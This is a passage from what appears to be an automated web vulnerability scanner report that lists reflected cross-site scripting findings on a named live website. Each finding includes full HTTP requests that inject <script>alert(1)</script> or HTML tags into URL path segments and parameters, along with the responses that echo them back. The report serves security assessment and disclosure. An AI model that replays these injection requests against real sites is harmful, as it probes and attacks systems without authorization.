GET /detaild1371<script>alert(1)</script>d1cb6ee4e1eb27149/29/rating.php?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild1371<script>alert(1)</script>d1cb6ee4e1eb27149/29/rating.php?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.1997. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6618<script>alert(1)</script>367a6a2284f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29b6618<script>alert(1)</script>367a6a2284f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29b6618<script>alert(1)</script>367a6a2284f/rating.php was not found on this server.</p>
...[SNIP]...

2.1998. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df3af<script>alert(1)</script>605084808c59072aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/29df3af<script>alert(1)</script>605084808c59072aa/rating.php?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29df3af<script>alert(1)</script>605084808c59072aa/rating.php?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.1999. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e6ca5<script>alert(1)</script>b9322c325b6fce2c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/29/rating.phpe6ca5<script>alert(1)</script>b9322c325b6fce2c1?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.phpe6ca5<script>alert(1)</script>b9322c325b6fce2c1?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.2000. http://www.resellerbase.com/detail/29/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b468<script>alert(1)</script>61b7f6dde03 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/rating.php5b468<script>alert(1)</script>61b7f6dde03 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:29:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php5b468<script>alert(1)</script>61b7f6dde03 was not found on this server.</p>
...[SNIP]...

2.2001. http://www.resellerbase.com/detail/29/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8ef3c<script>alert(1)</script>2016eb0283c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/rating.php?8ef3c<script>alert(1)</script>2016eb0283c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:27:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php?8ef3c<script>alert(1)</script>2016eb0283c=1 was not found on this server.</p>
...[SNIP]...

2.2002. http://www.resellerbase.com/detail/29/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e46b<script>alert(1)</script>8860077c8849224da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/29/rating.php/7e46b<script>alert(1)</script>8860077c8849224da?id=29&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/rating.php/7e46b<script>alert(1)</script>8860077c8849224da?id=29&rating=5 was not found on this server.</p>
...[SNIP]...

2.2003. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50e80<script>alert(1)</script>d869feed3d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50e80<script>alert(1)</script>d869feed3d6/29/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50e80<script>alert(1)</script>d869feed3d6/29/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2004. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa918<script>alert(1)</script>2527d2151a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29fa918<script>alert(1)</script>2527d2151a3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29fa918<script>alert(1)</script>2527d2151a3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2005. http://www.resellerbase.com/detail/29/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8a84d<script>alert(1)</script>c2ad2baa2f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/search.php8a84d<script>alert(1)</script>c2ad2baa2f0?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php8a84d<script>alert(1)</script>c2ad2baa2f0?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2006. http://www.resellerbase.com/detail/29/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 95613<a>5af059702bb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search95613<a>5af059702bb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search95613<a>5af059702bb&opt=2 was not found on this server.</p>
...[SNIP]...

2.2007. http://www.resellerbase.com/detail/29/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b9d50<a>e032d6dab0e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...b9d50<a>e032d6dab0e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...b9d50<a>e032d6dab0e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2008. http://www.resellerbase.com/detail/29/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8793a<script>alert(1)</script>bf148951d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=2&8793a<script>alert(1)</script>bf148951d48=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search&opt=2&8793a<script>alert(1)</script>bf148951d48=1 was not found on this server.</p>
...[SNIP]...

2.2009. http://www.resellerbase.com/detail/29/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/29/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8e861<a>b7dd195f1bb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/search.php?keyword=search...&Submit3=Search&opt=28e861<a>b7dd195f1bb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/search.php?keyword=search...&Submit3=Search&opt=28e861<a>b7dd195f1bb was not found on this server.</p>
...[SNIP]...

2.2010. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fda04<script>alert(1)</script>485ac04a9b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfda04<script>alert(1)</script>485ac04a9b7/29/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfda04<script>alert(1)</script>485ac04a9b7/29/themes/ was not found on this server.</p>
...[SNIP]...

2.2011. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eecad<script>alert(1)</script>8d035c160b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29eecad<script>alert(1)</script>8d035c160b1/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29eecad<script>alert(1)</script>8d035c160b1/themes/ was not found on this server.</p>
...[SNIP]...

2.2012. http://www.resellerbase.com/detail/29/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8767e<script>alert(1)</script>4811ada4aea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes8767e<script>alert(1)</script>4811ada4aea/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes8767e<script>alert(1)</script>4811ada4aea/ was not found on this server.</p>
...[SNIP]...

2.2013. http://www.resellerbase.com/detail/29/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d1397<script>alert(1)</script>f57cd11fd09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/?d1397<script>alert(1)</script>f57cd11fd09=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/?d1397<script>alert(1)</script>f57cd11fd09=1 was not found on this server.</p>
...[SNIP]...

2.2014. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bf5a<script>alert(1)</script>fd05d3c1b7f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1bf5a<script>alert(1)</script>fd05d3c1b7f/29/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1bf5a<script>alert(1)</script>fd05d3c1b7f/29/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2015. http://www.resellerbase.com/detail/29/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/29/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cefb9<script>alert(1)</script>104fe8229fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29cefb9<script>alert(1)</script>104fe8229fe/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
